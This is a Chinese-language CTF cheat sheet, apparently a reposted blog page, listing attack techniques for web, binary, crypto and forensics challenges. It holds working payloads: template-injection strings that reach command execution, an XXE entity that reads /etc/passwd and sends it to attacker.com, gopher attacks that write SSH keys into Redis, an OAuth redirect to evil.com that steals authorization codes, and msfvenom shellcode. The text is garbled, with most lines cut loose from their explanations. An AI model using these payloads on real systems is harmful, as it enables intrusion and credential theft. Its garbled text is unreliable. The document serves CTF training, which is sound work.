本文共 3039 字,大约阅读时间需要 10 分钟。
CTF(Capture The Flag)竞赛是一种经典的网络安全竞赛,强调攻防逻辑和技术能力。以下是CTF核心逻辑与学习路线的详细干事。
/!50000注释/
混淆真实语句。CONCAT(CHAR(115),CHAR(101))
代替敏感字符。{ {''.class.mro[1].subclasses()}}
获取危险类。{ {_self.env.registerUndefinedFilterCallback("exec")}}
执行命令。php://input
读取POST数据,实现Webshell。logrotate
日志文件包含获取敏感信息。alg
字段为none
,删除签名。hashcat -m 16500
破解弱密钥。<!ENTITY xxe SYSTEM "file:///etc/passwd">
获取系统文件。http://attacker.com/?data=%xxe;
触发攻击。<img src="[URL]">
触发请求。gopher://
协议攻击Redis服务,写入SSH密钥。__destruct()
或__wakeup()
进行链式劫持。flask-unsign
伪造Session签名。Origin: target.com
,欺骗服务器返回数据。Transfer-Encoding: chunked
与Content-Length
绕过网关。....//
或%2e%2e%2f
绕过检查。redirect_uri=http://evil.com
窃取授权码。
窃取登录态。"flag"
或"correct"
定位关键逻辑。cyclic 200
生成字符串,结合dmesg
查看崩溃地址。%n
向某一地址写入数据。/proc/self/status
中的TracerPid
字段。strcmp
函数绕过密码校验。msfvenom -b '\x00'
生成无空字符-shellcode。Angr
自动化求解复杂问题。zbarimg
扫描并提取模糊或残缺二维码。=
)、Base32(全大写字母)、Base58(无0/O/I/l)。e=3
时,对密文立方。hash_extender
发射伪造合法签名。Stegsolve.jar
提取隐写数据。zipdetails
修改加密标记位。qpdf --stream-data=uncompress
获取隐藏文本或对象流。dir /R
查看ADS。89 50 4E 47 0D 0A 1A 0A
和CRC校验。http.request.method == "POST"
。volatility -f dump.raw pslist
。grep -oE
匹配特定格式。requests
和延时判断逐字符爆破。/.git/HEAD
确认存在,并使用git-dumper
恢复源码。vbaProject.bin
。FlateDecode
对象流。##sentence_end
扫描链接获取更多实用资料
转载地址:http://wzryk.baihongyu.com/